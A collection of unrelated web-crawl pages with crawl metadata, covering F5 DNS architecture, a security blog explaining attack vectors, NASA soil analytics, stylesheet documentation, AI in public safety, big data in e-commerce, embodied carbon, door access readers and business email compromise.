BIG-IP LTM also supports service provider–specific applications such as load balancing ENUM requests for SIP transactions. BIG-IP LTM solutions for naming services include: The F5 Intelligent DNS Scale reference architecture adjusts for high-availability and high-volume applications while simultaneously supporting millions of user requests per second. They work together with other BIG-IP service delivery features, such as the iRules scripting language, transparent application monitoring, , and other IP-related services to create a complete service delivery infrastructure: the F5 Service Delivery Network. Seamless scale and flexibility is achieved by leveraging the intelligent service delivery platform common to all BIG-IP devices. By using the F5 Intelligent DNS Scale reference architecture, organizations can: The F5 Intelligent DNS Scale reference architecture is an end-to-end DNS delivery solution that improves web performance by reducing DNS latency, protects your web properties and brand reputation by mitigating DNS DDoS attacks, reduces data center costs by consolidating DNS infrastructure. Most importantly, it directs your customers to the best performing components for optimal application and service delivery. The F5 Intelligent DNS Scale reference architecture also delivers the peace of mind that comes with knowing that your web applications will respond to all DNS queries—keeping your content and applications available to your users wherever and whenever they want to access them.
<urn:uuid:a9468a99-0fe8-4ad2-98e9-83c7bf38386f>
CC-MAIN-2022-40
https://www.f5.com/ja_jp/services/resources/white-papers/the-f5-intelligent-dns-scale-reference-architecture
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00068.warc.gz
en
0.92597
2,342
2.890625
3
What are attack vectors? How are they used? May 7, 2021 Last week we did a deep dive into data collection and how that data travels through the MACeBox and winds up at MACeHome. Now that it’s here, we need to begin building out our threat intelligence so that we can identify threats and respond accordingly. There are a few different ways that we can do this such as, monitoring commonly known attack vectors, continually building out Indicators of Compromise (IoC) and Indicators of Attack (IoA), running data through ML models to look for correlations, and most importantly utilizing the knowledge, experience, and passion of our human threat hunting team. Ok, I just threw a bunch of words at you so let’s start at the top of the list by looking at attack vectors. What are they, how do hackers use them, what kind of impact can they have, and how can we use those same vectors against the threat? Wow, those are some great questions. You’re on top of it today. What are Attack Vectors? If you’re familiar with aviation or maritime practices, vectors are headings and paths that can help a plane or ship determine their course of travel or distinguish between moving and stationary objects to avoid collisions. In cybersecurity, attack vectors function in a similar way - paths that an attacker can choose to take to avoid being noticed. Attack vectors are different methods that the malicious actors use to force their way in and spread through your network by finding, or in some cases, creating a literal hole in your defense. Attack vectors come in a lot of shapes and sizes. Here’s a very small fraction of the types of vectors at a hacker’s disposal: - Software vulnerabilities (zero-day, injection, access control, xss) - Compromised credentials - Weak passwords - APT (Advanced Persistent Threat) How do hackers use Attack Vectors? Let’s take a look at a few of the examples from above. Weak passwords are like word searches for threat actors - keep looking and eventually you come across one you know. Distributed Denial of Service (DDoS) attacks are used to disrupt the normal traffic on a server by overloading them with requests. Software vulnerabilities, like cross site scripting, access control, and unpatched zero-day exploits are common attack vectors used by malicious actors to infiltrate your network. And of course, let’s not forget about that generous Nigerian prince who is awaiting your reply in order to deposit $1m USD into your bank account - just let him know where he needs to deposit the funds. What kind of impact can Attack Vectors have? In the above examples, it all comes down to PPT (no, not PowerPoint files), People, Processes, and Technology. Back in March, the California State Controller’s Office was hit by a phishing attack where an employee clicked on a malicious link, “logged in” to the imposter site, and inadvertently allowed a hacker access to their email for about 24 hours. This gave the hacker the ability to view PII from the Unclaimed Property Holder Report as well as the opportunity to fire off more phishing emails to the user’s contacts, making the other malicious emails seem even more legitimate. This is why it’s important to train your people on the attack vectors that will impact them. Just a couple weeks ago, a security researcher found that an unsecured Experian API allowed anyone to access private credit scores of tens of million Americans just by entering in a few easy-to-find parameters. While this may not seem like a big deal, hackers now know who is worth their time. If the standard process for securing those APIs were followed by people, this would not have been the case. When it comes to technology, just take a look at Solarwinds or the Microsoft Exchange attacks. The vulnerabilities were known, patches were pushed out, and organizations sat on this information while nation-states were quick to move in and target those who were unable to respond, costing companies Billions of dollars across ransoms, legal proceedings, PR nightmares, loss of sales revenue due to loss of trust, and repercussions due to employees and customers. People, process, and technology are the 3 pillars of attack vectors that hackers focus on when planning and executing their attack. How do we use Attack Vectors against malicious actors? As I mentioned before, a vector is a path or bearing between two points. If you know that path (and we know those paths), then you can trace the line until you find the breach. Or, if you have enough data (pssst, we covered that last week - to the tune of billions of data points per week) you can get there even faster by triangulating their position. This is our concept of creating haystacks and then looking for the elusive needle. By understanding the common and emerging attack vectors, we can find clues in the data that we gather to build out our threat intelligence so that you can rest assured that we keep your data safe. After all, we’re Milton Security. Obviously, we protect your brand. Stay tuned, because next week, we’ll dive into IoC and IoA and how the ML models we use help us quickly identify suspicious activity.
<urn:uuid:78a395fc-9136-49e7-b3ca-55748596fb77>
CC-MAIN-2022-40
https://www.miltonsecurity.com/company/blog/what-are-attack-vectors
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00068.warc.gz
en
0.95177
1,148
3.28125
3
NASA data is powering soil analytics that can deliver accurate and scalable irrigation and fertilization metrics and enable research into the impact of extreme weather events. NASA data is powering soil analytics that can deliver accurate and scalable irrigation and fertilization metrics and enable research into sustainability and the impact of extreme weather events. The Harvest Consortium, part of NASA’s Food Security and Agriculture program, is partnering with CropX, a soil analytics firm, to gain advanced insights for global agricultural monitoring. CropX uses 18-inch in-ground soil sensors that collect and geo-tag moisture, temperature and salinity data at multiple depths. Data from the soil sensors, precise weather and evaporation forecasts, satellite images and other moisture-related data are fed into the company’s crop models to show how water, nutrients and salinity levels affect the development of specific crops. The soil intelligence platform’s machine learning algorithms of are constantly refined based on actual growth of the crops. The in-ground sensors are a key data source. “Most agricultural companies rely on above-ground data such as satellite imagery, and less than 10 percent of companies get data from within the soil, which is where the most valuable data is,” Matan Rahav, director of business development at CropX, said in an Amazon Web Services case study. “By the time there are visible signs of crop stress detected from space, the damage is already done.” CropX and NASA are conducting a year-long pilot across alfalfa farms in Arizona that will fine-tune the algorithms to provide accurate and scalable irrigation and fertilization metrics based on CropX’s soil intelligence data and synthetic aperture radar information from NASA satellites. The integration of NASA data along with satellite data from partner agencies will help establish the parameters for water usage estimates, yield prediction, soil quality and land usage assessments based on multiple crop growing cycles. “We are in a constant race to produce and supply enough food in order to feed a rapidly growing global population, with finite land and natural resources. NASA Harvest is dedicated to collaborating with top innovators to make the best possible use of our agricultural land,” NASA Harvest Program Director Inbal Becker-Reshef said. “CropX unites our space-led vision with on-farm intelligence and results.” NASA data is also powering a new tool the Department of Agriculture developed to provide easy access to soil moisture data. The Crop Condition and Soil Moisture Analytics tool provides access to high-resolution data from NASA’s Soil Moisture Active Passive mission and the Moderate Resolution Imaging Spectroradiometer instrument. The tool provides more thorough spatial coverage and consistency than other soil moisture measurement methods, said Rajat Bindlish, a research associate in Earth science remote sensing at NASA’s Goddard Space Flight Center. The primary users of the tool will be researchers and statisticians at USDA’s National Agricultural Statistics Service who currently release weekly reports that classify states into moisture categories and track crops’ health and growing progress. USDA researchers and statisticians will incorporate the tool into applications that spot flooded fields and identify conditions that might prevent planting, according to NASS Spatial Analysis Research lead Rick Mueller. In addition to supporting agricultural operations, it will enable research into sustainability and the impact of extreme weather events, Mueller said. “These satellite-derived vegetation condition indices and soil moisture condition maps show first-hand the ever-changing landscape of U.S. agriculture.”
<urn:uuid:ef616569-1a0a-45d6-9743-2732c7798c0f>
CC-MAIN-2022-40
https://gcn.com/cloud-infrastructure/2021/03/nasa-data-supports-agricultural-analytics/315988/?oref=gcn-next-story
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335365.63/warc/CC-MAIN-20220929194230-20220929224230-00068.warc.gz
en
0.891544
729
3.40625
3
Opening the stylesheets dialog, using the stylesheets dialog, applying a stylesheet to a layout, creating a new stylesheet, updating a stylesheet, and deleting a stylesheet. You can apply a Stylesheet to a layout in Design Mode using the Stylesheets dialog. To open the Stylesheets dialog: In layout design mode, select Stylesheets > Apply or Create a Stylesheet. Stylesheet Gallery: The left column of the Stylesheets dialog lists the available Style Sheets. Clicking on a stylesheet name displays a preview of the style sheet in the Preview pane. The right column lists the commands available. To apply a selected Stylesheet to a layout: Select the Style Sheet from the list and click the Apply button. The layout is updated to reflect the Stylesheet formatting. There are two ways to create a new Stylesheet. You can create a Style Sheet based on an open layout, or copy an existing Stylesheet. Copying Stylesheets lets you create variations without losing the original, and lets you modify the built-in Alpha Anywhere Stylesheets. To create a new Stylesheet based on the current layout: Click the Create New button. In the Create New Stylesheet dialog box, enter a Style Name for your new Stylesheet. Entering a Style Name: To copy an existing style: In the Stylesheets dialog, select the style you want to copy. Click the Duplicate button. Enter a Style Name for the new style and click Duplicate. Enter a Style Name for the Duplicate: The new style appears in the Stylesheets dialog. You can update an existing Stylesheet to reflect the formatting of a layout. Note : Updating a Stylesheet overwrites existing properties in the Stylesheet. You cannot update system Style Sheets. To update an existing Stylesheet: In the Stylesheets dialog, select the style you want to update. Click the Update button. Alpha prompts you to make sure you want to overwrite the Stylesheet. You can delete user-created Stylesheets, but not the system Stylesheets. To delete a Stylesheet: In the Stylesheets dialog, select the style you want to delete. Click the Delete button. Alpha prompts you to makes sure you want to delete the Stylesheet.
<urn:uuid:c38f7f73-4395-4b2c-a5a3-fa1d2ff17929>
CC-MAIN-2022-40
https://documentation.alphasoftware.com/documentation/pages/Guides/Desktop/Design/View/CSS/Stylesheets%20Dialog.xml
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00068.warc.gz
en
0.655328
498
2.515625
3
With artificial intelligence, public-safety organizations can reduce the labor associated with mundane security tasks and leverage human skills such as creativity, strategic thinking and interpersonal communication. Many people who work in the state and local government security space are wary about the impact of artificial intelligence on their jobs. They know the technology has the potential to help automate their systems but also worry about how it might impact the human workforce. On the surface, this seems like a legitimate concern -- the idea of a computer doing what a human can do in a fraction of the time and for less money is worrying to many people. However, there are many other factors that should be considered. When people are stuck performing mundane security tasks like watching camera feeds, monitoring social media activity or physically checking the same areas of a facility repeatedly, they can’t leverage valuable human skills such as creativity, strategic thinking and interpersonal communication. Because AI systems can now take on the bulk of routine monitoring and analysis work, it frees up human capital to be used more effectively by state and local governments looking to better honor their commitment to citizen safety. In other words, AI enables organizations to better utilize human potential by providing a more cerebral role for security operators. Many state and local agencies face challenges to implementing AI due to a widespread misunderstanding of how AI functions. Many who think of artificial intelligence picture a dystopian future of evil robots, slowly but surely becoming smarter than humans and eventually taking over. Because of this perception, agencies often face public pushback. While there is some potential for irresponsible applications of AI, the overwhelming majority of use cases are harmless. The technology is most commonly used to automate repetitive processes that don’t need 24/7 attention from a human -- such as data entry or monitoring RSS feeds for potential security threats or other risks. It’s important to remember that AI should not be used to replace a person’s role, but instead to make time for more complex tasks. Even when it comes to jobs that require human insight, there are ways that AI can help. It can quickly analyze video footage, for example, alerting command center operators to a potential threat, before automatically presenting critical information such as an exact location or a map of nearby security assets, along with step-by-step instructions for evaluation and resolution. The role of AI in public safety AI will certainly benefit all areas of public safety, especially when it comes to keeping citizens safe. Because threat scenarios vary, it can be difficult for security operators to take swift, appropriate action. Further, false alarms can be costly, and, worse, missed detections can be deadly, so control rooms operate under tremendous pressure, which in turn increases the risk for error. Fortunately, AI-powered analytics can provide continuous monitoring and real-time detection of threats. When it comes to maintaining physical security, AI analytics tools can identify unattended objects and ultimately determine the level of risk they pose. For example, an unattended glass in a bar will have a different threat rating than an unattended backpack at a subway station. For vehicles, AI is able to automatically cross-reference license plates with the registered make and model of a car to determine whether or not the information matches and flag suspicious activity. By implementing AI solutions, public-sector organizations can reduce costs while improving operational efficiency, enabling them to improve security in areas of need, such as placing cameras in places that lack visibility. And with new AI tools, organizations will be able to better interpret the vast amounts of data collected from existing security devices and systems that may have otherwise gone unused. Deploying AI will result in faster incident resolution, increased situational awareness and enhanced forensic capabilities. Ultimately, these tools will not take away jobs, but enhance them, especially in the state and local government space. While this could mean familiar jobs may look different in coming years, the number of new jobs made possible by the automation of repetitive tasks will grow, helping expand the workforce and enabling better public safety and security.
<urn:uuid:7d336f9f-961b-4733-b405-ddda56faae37>
CC-MAIN-2022-40
https://gcn.com/2019/12/using-ai-as-a-workforce-multiplier/298193/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00068.warc.gz
en
0.932629
810
2.671875
3
Almost everything we do, both online and offline, is a source for data. As technology increases, the ways to measure and collect data also increase. One of the ways we understand our world is to study trends in behavior. The issue that people run into now, however, is that technology has expanded to the point where we have “too much” data. Organizing, studying and understanding this information has become even more complicated because we’re inundated with endless numbers, facts, percentages and perceptions. Big data has been a buzzword floating around the digital space for a few years now, a concept that is murky to some and not understood at all by others. So, what exactly is big data? Understanding big data Big data is the combined collection of traditional and digital data from inside and outside your company. Its purpose is to be a source of analysis and continued discovery. The introduction of big data has allowed businesses to have access to significantly larger amounts of data, all combined and packaged for analysis. This data offers insight for e-commerce businesses. E-commerce business owners can take the information from big data and use it to study trends that will help them gain more customers and streamline operations for success. 1. Increased shopper analysis Understanding shopper behavior is essential for business success. Big data is an essential component of the process, and provides information on trends, spikes in demands and customer preferences. Business owners can use that data to make sure most popular products are available and being marketed. If customers visit your site to search for products you don’t offer, big data is how you will learn about those searches, helping you seize new opportunities. In 2018, big data analysis will continue illuminating important shopper behaviors and patterns, such as popular shopping times and spikes in product searches. During this year, you will see more e-commerce businesses fine-tuning their marketing strategies, social media advertising and intuitive shopping processes to continue boosting sales and engagement in a competitive market. 2. Improved customer service 3. Easier and more secure online payments - Big data integrates all different payment functions into one centralized platform. Not only does it help with ease of use for customers, it also helps reduce fraud risks. - The advanced analytics offered by big data are powerful and intuitive enough to discover fraud in real time and to provide proactive solutions for identifying risks. - Big data can detect payment money laundering transactions that appear as legitimate payments. - Recently, payment providers have started realizing the potential of monetizing merchant analytics. Payment providers can help different merchant retailers understand their customers better. - Data analytics allows e-commerce businesses to cross sell and upsell. - Push notification-generated sales act as an effective means to validate customer data. 4. Continued advances in mobile commerce The number of people who use smartphones is increasing every day, to the point where researchers predict desktop computers will soon become obsolete. Big data makes mobility possible, especially when it comes to e-commerce. Brands can now collect data from multiple sources and analyze customers through mobile technology. Google has jumped at this trend, giving preference to sites that are mobile friendly and responsive. Companies who do not have mobile friendly websites will continue to see a decline in traffic to their pages. 5. Virtual reality advancements in the retail world Big data and virtual reality are two of the biggest technological innovations in the world right now, and their connection only enhances their effectiveness. Together, big data and virtual reality are revolutionizing the e-commerce world. They offer the tools needed for businesses to more efficiently present their brand, advertise and offer an evolving shopping experience for customers – right from the comfort of their homes. Virtual reality can analyze big data and change actions based on its findings, often without the help of a human. We can expect to see even more virtual reality and streamlined shopping experiences soon, thanks in large part to big data. The big data revolution has only enhanced the e-commerce process, making it easier for online stores to be successful and useful. For e-commerce store owners looking to get ahead, big data provides a wealth of tools needed to find success. In 2018, e-commerce will continue to evolve with big data, taking online shopping to a whole new level. Like this article? Subscribe to our weekly newsletter to never miss out!
<urn:uuid:d9bd025b-0c25-40f5-ac98-6d512b912292>
CC-MAIN-2022-40
https://dataconomy.com/2018/02/5-ways-big-data-analytics-will-impact-e-commerce-2018/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00068.warc.gz
en
0.940048
893
2.59375
3
The future we face is a challenging one and so deserves a brief recap to set the stage. As the density of carbon in our atmosphere increases, the planet warms. Far from being a simple change in temperature, the knock-on effects are legion and becoming more apparent every year. Fires, floods, droughts, and extreme temperature swings are becoming the norm and these changes appear to be evolving in both intensity and duration. It’s interesting to note that Bill McKibben’s book “Eaarth: Making a Life on a Tough New Planet” has now eleven years old, and much of its thesis is coming to pass. The fundamental orientation the book offers is this: stop thinking of the earth as we have known it, start thinking of it as a new world that we must find a way of making a living on. What is inspiring about this mindset is that it avoids the two mental traps that discussions of climate change tend to create. When bringing up the subject most people either default to business-as-usual denial or apocalyptic fatalism. Neither are helpful and both are delusional and utterly passive. What we have here is an opportunity, a frontier! There are many ways in which this frontier is being explored. For the past decade or so in the architecture profession, we have been focusing on creating buildings that reduce energy consumption and by proxy carbon. Specifically, we have been focusing on operational energy/carbon. This means reducing the energy it takes to provide for human comfort and occupation, think lights, power, heating and cooling. Many great strides have been made supported by both the building industry and regulatory bodies demanding better building performance. But this is only part of the picture when it comes to reducing energy and carbon in buildings. Recently there has been an increased awareness and focus on embodied energy/carbon. This means the energy used and carbon emitted by the construction and maintenance of buildings. It means looking deeply into how building products are made, where raw materials are sourced from, how they are processed, how far they must travel to the site, etc. Interestingly, this also creates a higher value in buildings that have already been made as their embodied carbon is already mostly emitted. In the timeframe we have left to make a measurable dent global warming, a focus on embodied carbon is essential for the building industry. If there are three key issues poised to change the way we build in the 21st century, this is number one. There are two aspects in much need of attention, the creation of new suites of building materials and development of new, robust and rapid means of measuring embodied carbon. Taken as a whole, most current systems of construction are very carbon intensive. Awareness of this has been changing in the last few years with an emphasis on recycling materials. While currently structural steel is about 98% recycled content, the reforming process still ultimately emits a fair amount of carbon. There is great promise in mass timber construction but its cost and building codes still have not adapted yet to be widely used. These point in a positive direction but much more is needed, particularly with building enclosure systems. Most exterior wall systems have a fair amount of aluminum which carries a heavy carbon footprint, ditto petroleum based (but very cost effective) insulation. These systems in particular are ready for a disruptor in their industry. The embodied carbon measurement methodology has been in discussion for years. A mantra in management circles is “ you can’t manage what you can’t measure”. The Carbon Leadership Forum, a non-profit based in Washington State has been developing a robust measurement methodology since 2009. In September of 2019, they released their EC3 (Embodied Carbon in Construction Calculator) tool which is a massive step forward and yet it is not the only measurement and reporting solution possible. My own company is funding a team to develop an internal commercial grade software, embedded in our design process, to address embodied carbon. One is reminded of the early days of the personal computers. As it turned out, IBM didn’t end up owning the marked and the name of the game changed from producing better hardware to producing better software. Likewise here, there is much room to develop different approaches to managing and representing the data regarding embodied carbon. These new approaches will be flexible to fit the working methodologies of their target clients be they architects looking for better insight into their design decisions or materials suppliers looking for a new breakthrough in their product lines. It may indeed move beyond selling software as a product to carbon tracking as a service. The historian Walter Prescott Webb noted that there were three key technologies that enabled the settlement of the great plains of North America, the revolver pistol, the windmill water pump and industrially produced barbwire fence. We now face a new, environmentally driven, wilderness where technology will play a key role for making a good life. We in the building industry eagerly await the arrival of more building material systems and analytical tools that will enable our progress. We are ready to take on the challenges of the 21stcentury frontier.
<urn:uuid:3bb43108-7b4e-4fb4-910c-af09071d737f>
CC-MAIN-2022-40
https://iconoutlook.com/a-new-frontier-in-the-making-of-a-post-carbon-future/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00068.warc.gz
en
0.963861
1,021
2.703125
3
Comparison of Door Readers Used in Access Control Systems A door reader is an integral part of a door access control system. It is the interface between the person at the door and the rest of the access control system. We have come a long way since the early magnetic stripe cards. The new door readers can read RFID card credentials, mobile phone credentials, and biometric credentials. Some of the door readers are combinations of a reader and a controller. This means that all the intelligence is built into the reader at the door. This reader-controller connects to the network. This article provides a comparison of available door access control readers. What is a Door Access Control Reader? An access control door reader is a device placed at an entry point that is used to determine if a person can enter the door. The door reader reads a credential that is presented by the person entering. The credential is something that a person carries (like a card) or a biometric signature such as a fingerprint. If the credential ID (or biometric identifier) matches the registered access control list, the electric door lock is opened. Proximity Door Readers Proximity RFID readers connect to an access controller such as the Hartmann controller, using the Wiegand or OSPD (Open Supervised Device Protocol) interface. You can select readers for indoors or outdoors applications. Some readers include keypads that can be used instead of a credential or enhance security by requiring a secondary access code. There is a choice of economic credentials such as cards and keyfobs. There are 125 kHz frequency credentials and 13.56 MHz frequency credentials used by Smart cards (or Mifare). A few readers can handle both frequencies. RFID is a Radio Frequency Identification signal that is used to communicate between the credential and the door reader. The credential (a card, keyfob, or tag) contains an antenna, responding electronics, and an identification number. The reader broadcasts a signal that is received by the credential antenna. The broadcasted electrical signal from the door reader contains enough power to energize the circuit in the credential. Once the electric circuit in the credential receives enough power, it sends back a signal to the access control reader that includes its identification (ID) number. Some readers, such as the Isonas reader, have the controller built-in. This reduces the wiring and makes it easy to install. Readers that Use Your Mobile Phone as the Credential Smartphones can be used as a credential. This is a nice touchless door entry method that saves money on card credentials. The app on your smartphone provides the ID to the door reader. The Isonas reader-controller is an example of a door entry device that can read both RFID proximity credentials and mobile credentials. The Hartmann Enterprise Door Access Control System includes more sophisticated mobile readers that provide a variety of methods for opening. For example, you can wave your hand in front of the reader without taking out your phone. Since mobile phones use biometrics to use them, it provides increased security. Biometric Door Readers Biometric readers are the most secure entry control device. You can forget your card credential, but not your face or finger. You don’t have to worry about your fingerprint or face being stolen. Instead of storing a picture of our actual fingerprint or face, the biometric readers capture only a small subset of data and convert these minutiae points to encrypted binary data. The code can only be retrieved using a mathematical algorithm that has no physical relationship to the biometric. Most fingerprint readers are used indoors. The TVIP3F-ProWP is one of the few biometric readers that can be used outdoors. The basics are simple. Each person’s fingerprint is unique, and the pattern created by the fingerprint has been quantified by law enforcement. It includes several basic patterns such as arch, loop, and whorl that are used for identification. Many fingerprint readers can also use card credentials or PINs to control entry. Select the fingerprint reader… Vein pattern recognition dramatically increases the reliability of the biometric reader. The multi-biometric capability processes the vein pattern under the finger as well as the fingerprint. This biometric information is captured and converted to a biometric template. The matching and verification algorithm is more accurate than using fingerprints. These specialized facial recognition systems use cameras to capture the full facial image. The software then uses various computer algorithms to build a definition data set, including machine learning. Facial recognition indoors is more reliable than outdoors because the changing light makes the recognition process difficult. The TVIP-Face8WP face recognition panel is one of the few outdoor devices because it has intelligence that allows operation in changing light and weather conditions. Our article, Face Recognition for Door Access Control, provides more details about access control technology. Over the last year, new face recognition panels have been introduced with temperature measurement. This allows any organization to check the identity and the temperature of the person entering. These panels can control a door, make audio announcements, detect if a person is wearing a mask, and notify a central security person over the network. Learn more… Smart Intercom Door Systems for Apartments and Multi-tenant Organizations An apartment intercom is a communication device used in the lobby or at the front entrance of a multi-tenant building or apartment house. It provides a connection to the tenants. This type of reader-controller is used to control visitors. Some units also include RFID-type capability that allows the tenants to enter the building. The new wireless intercom allows you to contact the resident’s smartphone or standard phone to request entry into the building. The lobby intercom display provides a list of all the tenants in the building. Summary of Door Readers There are many different types of door reads. The best kind of reader depends on your application. The door readers can connect to a controller or can include built-in controllers. The biometric readers provide the highest level of security, while the RFID-type readers cost less. Specialized readers with controllers have advanced capabilities such as smartphone credentials, intercoms, and visitor control. To learn more about door readers for access control, please get in touch with us at 800-431-1658 in the USA or 914-944-3425 everywhere else, or use our contact form.
<urn:uuid:592e64d1-278f-410c-8030-d018f805cfef>
CC-MAIN-2022-40
https://kintronics.com/door-readers-for-everyone/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00068.warc.gz
en
0.898384
1,319
2.59375
3
Vehicle manufacturers have been investing heavily in the development of Advanced Driver-Assistance Systems (ADASs) over the past decade, and in the last year, US-based self-driving startups received a staggering $4.5bn worth of VC funding. As investment pours into the sector the potential applications of autonomous technologies continue to expand, but how will driverless vehicles evolve over the next decade? And how will these developments impact our cities? Widespread integration of ADAS Early iterations of ADASs offered assistance with basic system monitoring and warnings, but in recent years ADASs have evolved to encompass more advanced tasks now often associated with autonomous vehicles, such as parking, breaking and steering. Vehicle manufacturers and major technology players are both investing heavily in autonomous technologies, and with pioneers in the space demonstrating their capabilities, it’s highly likely that we’ll see more advanced ADASs integrated into commercial vehicles in the next two to three years. Ultimately, the introduction of high-level ADA Systems will prove beneficial to a wide range of road users. Not only are we likely to see autonomous vehicles being used across short distances to move people along pre-planned routes in shuttle-like services, but we’ll also see long-distance hauliers benefit from the support that ADA Systems can provide drivers. Collectively, these technologies will not only reduce congestion – particularly in densely populated cities – but also help to reduce road accidents. Underpinning the development of these high-level assistance systems will be improvements in the sensors that they rely on. These developments (including increased range and accuracy on lidars, radars and cameras) will also be supported in improvements to General Processing Units (GPUs), which will allow Autonomous Vehicles’ (AVs) onboard computers to process sensor data faster and more accurately. 5G deployment will also promote further innovation in the AV space, particularly as connected devices become more integrated into our cities. The increased number of smart devices and sensors within cities will provide AVs with data that embedded sensors will not have access to, such as traffic. A deeper understanding of the limitations of AI and deep learning will also help to mitigate the risks inherent to these technologies, in turn allowing the industry to utilise it in the most effective ways possible. Prioritisation of safety The safety of both passengers and pedestrians will be fundamental to the evolution of AVs over the next decade. The best way to ensure that AVs and inhabitants can interact and co-exist safety within densely populated areas is to review and re-engineer city centres and the variety of transportation solutions that serve them. The majority of today’s cities have been designed to prioritise ease of access for vehicles, not for pedestrians. However, in an era of rapid growth for cities across the globe, more and more city leaders are re-evaluating who their cities are designed for. While giving cities back to pedestrians might seem like a somewhat radical move, prioritising walkability within cities doesn’t have to mean the elimination of vehicles entirely. Redesigning urban environments to prioritise pedestrians not only improves the flow of people within community spaces but can also open up opportunities for transport innovation in the form of AVs. AVs are able to provide solutions for a wide range of mobility needs for both people and goods at the appropriate speeds for high footfall areas. Slower speeds, additional levels of redundancy, and reduced reliance on GPS mean that low-speed AVs can function safely in densely populated city centre environments with tall buildings and trees. This can offer inhabitants a short-distance transport option that is not only efficient but also environmentally conscious. Longer distance higher speed autonomous transportation solutions will also continue to develop further over the coming years in a bid to reduce emissions and ease congestions within cities and the expanding suburbs that surround them. One solution, Autonomous Rapid Transport (ART), presents an exciting opportunity for improving road safety in cities and the surrounding areas. This rapid transport solution, involves a high frequency of AV shuttles operating in segregated road lanes and can offer a more efficient, flexible and frequent service than alternative bus or shuttle offerings while removing the need for a human driver and increasing safety. How autonomy will impact cities Autonomous vehicles are already altering the landscape of our cities slowly, and as these solutions get deployed more widely, the change will become increasingly tangible. In cities across the globe, it seems that single occupancy cars remain the default mode of transportation. However, as our cities continue to grow, city planners are increasingly looking for ways to improve walkability and promote transport solutions that are smart, electric and shared. As urban environments become increasingly pedestrianised, city centres will likely become more compact and walkable, linked by efficient public transport networks and autonomous transport solutions including on-demand ride hailing and shuttle like services. As these services become more readily available, inhabitants will start to use the most time efficient, convenient, and sustainable transport solutions available to them. These options will vary between cities, but the most progressive will likely embrace a number of options, including drones, autonomous shuttles and ride-hailing services, scooter and bike sharing services. As these solutions provide greater convenience to city inhabitants, traditional car ownership will begin to decline, and peer-to-peer services and platforms will rise in popularity. Investment into autonomous vehicles will undoubtedly continue to rise in the coming years, with a recent report from Intel predicting that the mobility-as-a-service market will scale from $800bn in 2035 to a staggering $7tn by 2050. The Accelerating the Future study also revealed that autonomous vehicles are predicted to save more than 580,000 lives between 2035 and 2045 – highlighting the importance of prioritising safety in any future developments. As the technology that supports autonomous vehicles improves and becomes increasingly more accurate, the applications and prevalence of these vehicles on our roads and in our cities will multiply. While fully autonomous high-speed vehicles are still more than a decade away, low-speed solutions are already beginning to shape the nature of cities, fundamentally altering and improving, the lives of its inhabitants. Adrian Sussmann, President, COAST Autonomous (opens in new tab) Image Credit: Karsten Neglia / Shutterstock
<urn:uuid:7bc265dc-f945-404f-9df4-175528079c10>
CC-MAIN-2022-40
https://www.itproportal.com/features/how-will-autonomous-vehicles-evolve-over-the-next-decade/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00068.warc.gz
en
0.947728
1,276
2.71875
3
Malicious groups and individuals continue to be highly active online in 2019 – highlighting the importance of robust education, processes and technology to organisations in tackling cyber-crime. Fraudulent ‘phishing’ messages that aim to trick people into disclosing sensitive information pose an ongoing and increasingly sophisticated threat. These scam messages – typically delivered over email – use a variety of techniques to convince the recipient they are legitimate communications, including the use of authentic logos, text and designs from trusted organisations. Phishing messages may also include links to fake versions of legitimate websites. These fake websites aim to trick a visitor into entering details such as usernames or passwords. Messages may also include attachments loaded with malicious software that aims to infect a computer to disrupt its operations or capture sensitive information. While variations such as ‘spear-phishing’ – that occurs when malicious groups target an individual by using his or her personal information to elicit sensitive information – are well known, business email compromise is a comparatively new but increasingly potent threat. Business email compromise occurs when a group or individual impersonates a business representative – often a senior executive – at an organisation to trick employees, vendors or customers to transfer money or sensitive information to the malicious party. The FBI noted in mid-2018 the incidence of ‘identified global exposed losses’ from business email compromise had risen 136% between December 2016 and May 2018 – with the real estate sector a prime target. The Australian Cyber Security Centre (ACSC) noted in October 2018 “criminals are constantly developing increasingly sophisticated business email compromise techniques often include a combination of social engineering, email phishing, email spoofing [forging an email sender’s address] and malware [malicious software]” to trick recipients. Importantly for many organisations, the ACSC notes that business email compromise attacks tend to spike around tax time – when many people are busy and under pressure to complete workplace tasks quickly. So how can your organisation protect itself against business email compromise? The ACSC has posted comprehensive information here about the types of business email compromise; how to recover from an incident; and techniques for minimising the risk of being caught out by this type of attack. By Roger Carvosso, Product and Innovation Director Stay Up To Date Stay up to date with the latest news, tips and product features
<urn:uuid:5f80b504-8646-4ab6-9a23-6976657d72d9>
CC-MAIN-2022-40
https://firstwave.com/blogs/business-email-compromise-a-key-threat-in-2019/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00068.warc.gz
en
0.936623
476
2.546875
3
